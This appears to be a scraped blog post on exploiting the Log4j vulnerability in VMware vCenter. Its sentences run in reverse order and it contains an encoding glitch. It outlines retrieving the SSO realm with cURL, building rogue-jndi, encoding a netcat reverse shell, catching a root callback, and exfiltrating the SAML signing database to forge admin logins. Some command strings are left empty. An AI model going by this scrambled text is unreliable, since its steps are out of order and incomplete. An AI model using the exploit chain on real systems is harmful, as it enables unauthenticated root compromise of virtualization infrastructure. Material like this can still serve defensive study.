With local filesystem access as root, you can now exfiltrate the vCenter SAML signing database to generate an administrative login session for vCenter. That’s where this article from horizon3.ai comes in. This is all well and good, but you still can’t do much without credentials to locally interact with the vCenter API or admin console. If you did everything correctly, you should see vCenter grab the payload from rogue-jndi and then get a callback: Start up a netcat listener on the port you specified while building your reverse shell and issue the cURL command. Replace the values above with the relevant variables you’ve collected while building this exploit chain. With that Base64 output, build your command in rogue-jndi: java -jar rogue-jndi/target/RogueJndi-1.1.jar -command "bash -c " "" Modify the command to fit your needs, replacing the IP address and port. VCenter has nc installed out-of-the-box, so you can easily craft a reverse shell and Base64 encode it using the one-liner below. Big thanks to Twitter for figuring this part out. Once the Jar is compiled, you will have to craft a command to deliver the reverse shell. This one-liner should do everything you need: git clone & cd rogue-jndi & mvn package Make sure you have Maven and Java installed before attempting to compile this tool. The login realm you’re looking for is highlighted in the screenshot below: In the “Location” header, you’ll see a long URL that contains the server’s DNS hostname and the vCenter SSO login realm. We need to initially use a cURL command, similar to the one below, to get the SSO login realm from the affected instance. Exploitationįirst, let’s step through the exploitation process manually to break down the vulnerability. Code execution happens in the context of root on Linux systems and results in the complete compromise of virtualization infrastructure on internal networks. Using the Log4j vulnerability and Proof of Concept, we can easily obtain a reverse shell on affected VMWare vCenter instances and more. See more on the original Proof of Concept here: A Proof of Concept has been released for VMWare vCenter Server instances and explains how this vulnerability allows attackers to execute code as an unauthenticated user using a single HTTP request. Shortly after the issue was disclosed, VMWare announced that several of their products were affected. The vulnerability is wide-reaching and affects both open source projects and enterprise software, meaning we need to understand how to ID and remediate it in our network environments.
A vulnerability was recently disclosed for the Java logging library, Log4j.
0 kommentar(er)
